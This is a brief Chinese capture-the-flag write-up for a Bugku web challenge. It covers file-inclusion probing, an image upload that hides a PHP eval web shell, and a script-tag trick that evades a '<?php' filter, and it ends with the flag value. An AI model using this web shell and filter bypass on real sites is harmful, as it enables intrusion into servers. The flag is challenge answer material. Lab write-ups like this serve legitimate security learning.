原题:https://ctf.bugku.com/challenges/detail/id/106.html?page=1

话不多说

打开链接http://114.67.175.224:12595/index.php?file=hello.php
看到一个file=参数

试试?file=php://filter/convert.base64-encode/resource=xx.php

发现php://被屏蔽

查下看源码康康线索
有个注释

<!-- upload.php -->

16490489501.png

只能上传图片。
上传一个图片一句话试试

16490490241.png

<%php %>被屏蔽了。

想办法过掉屏蔽。搜了一下<script>标签可以过滤

<script language="pHp">
@eval($_POST['ant'])
</script>

成功连上
16490492161.png

 find / | grep flag
 cat /flag

flag{9ed8804a41b1fae5b5ce11eb89034bd8}

Q.E.D.